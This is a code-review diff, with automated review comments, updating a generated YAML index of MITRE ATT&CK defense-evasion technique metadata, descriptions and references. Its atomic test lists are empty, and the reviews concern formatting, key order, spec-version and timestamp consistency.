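Review bot: the T1036.010 description keeps trailing whitespace from upstream, visible as `\ \n\n` before the Impersonation sentence and as the space before the closing quote in `rather than user or service account names. "`; trim it if the generator allows, otherwise it will be re-emitted on every regeneration and keep producing noisy diffs. The rest of the new block is consistent with the other new objects (defense-evasion phase, `x_mitre_detection: ''` with `User Account: User Account Creation` as the data source, spec 3.2.0), and the T1556.001 header reorder that follows matches the pattern used for T1578.002.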
@@ -12168,6 +12470,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12182,22 +12485,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12255,48 +12578,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
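Review bot: the replacement nccgroup URL ends in `smuggling-hta-files-in-internet-exploreredge/`, where the slash in "Internet Explorer/Edge" has been dropped from the slug; that is plausibly how the site generates it, but confirm the link resolves before merging since the old research.nccgroup.com path is removed in the same hunk. The retrieval date update to September 12, 2024 is consistent with that re-check.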
@@ -12318,6 +12610,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12328,23 +12621,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12385,8 +12705,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12422,43 +12743,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
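Review bot: `spec_version: '2.1'` is deleted from this technique and, reading down the rest of the patch, from every other technique in the file, while `x_mitre_attack_spec_version` moves from 3.1.0 to 3.2.0; that combination reads as a change of source bundle for the index generator rather than a content edit, and the PR description should state which ATT&CK release and which bundle format (STIX 2.0 vs 2.1) the indexes are now built from. Any consumer that reads `spec_version` out of this YAML will now get nothing back, so grep the repo's own scripts for that key before merging.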
@@ -12469,18 +12770,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
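Review bot: the T1070.004 entry is rewritten across this and the previous hunk purely because its keys come out in a different order (`x_mitre_platforms`, `x_mitre_domains`, `external_references`, `type`, `id`, `created` move from the head of the object to its tail); the only content changes are `modified` advancing to 2024-10-15 and `x_mitre_attack_spec_version` going from 2.1.0 to 3.2.0, both consistent with an upstream refresh. Consider sorting keys, or preserving upstream order, in the emitter so a refresh produces a reviewable diff. Separately, the unchanged description context shows `del`, `rm` and `unlink` each split onto their own line ("include del / on Windows and rm / or unlink"), which suggests inline markup around those tokens was stripped when the text was imported; that is pre-existing, but it belongs in the same generator fix.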
@@ -12542,7 +12861,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
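Review bot: `modified` moves backwards here, from '2022-05-11T14:00:00.188Z' to '2022-01-12T18:16:56.176Z', and the same happens for T1134, T1564.005, T1055.005, T1622, T1574.002, T1055.008, T1027.007 and T1564.001 later in the patch; every removed value shares the `.188Z` millisecond suffix, which looks like a bulk conversion timestamp from the previous source bundle rather than a set of real edits. That is acceptable if the bundle switch is intentional, but anything that treats a larger `modified` as "newer" will now see regressions, so call it out in the changelog and do not rely on `modified` for update detection across this commit.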
@@ -12572,13 +12891,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
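Review bot: T1221 loses `x_mitre_attack_spec_version: 2.1.0` along with `spec_version` and nothing is added in its place, whereas T1070.004 above is bumped to 3.2.0 and T1622 and T1027.007 further down keep 2.1.0 in unchanged context. After this change the file therefore carries objects at 2.1.0, 3.1.0, 3.2.0 and with no value at all. If that mirrors the upstream objects it is fine, but check that the emitter is not silently dropping the key when the source lacks it, and make sure nothing downstream assumes the key is always present.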
@@ -12675,7 +12992,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12738,7 +13054,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12776,7 +13091,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12803,8 +13118,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12832,7 +13145,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12876,8 +13189,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12932,7 +13243,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -12952,7 +13263,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -13002,7 +13312,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -13057,12 +13366,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13112,12 +13420,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13177,8 +13484,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13195,37 +13502,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
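Review bot: the new T1548.006 description is emitted with the `|+` block indicator, which keeps the trailing blank line, so this value now ends in two newlines while the other descriptions in this patch use `|-` or a quoted scalar (and this entry previously ended in a single `\n`). It parses fine but will round-trip differently and will show up as a diff again the moment the emitter is normalised; prefer `|-` unless the upstream trailing newlines are meaningful. The wording itself is upstream text (note the odd phrase "and an overwrites file (if connected to an MDM)"), so leave it as is; the version bump to 1.1 and the two added contributors in the following hunks are consistent with a description rewrite.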
@@ -13233,6 +13521,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13240,7 +13530,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13270,7 +13560,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13316,7 +13605,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -13361,8 +13650,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -13407,7 +13694,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13421,58 +13708,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
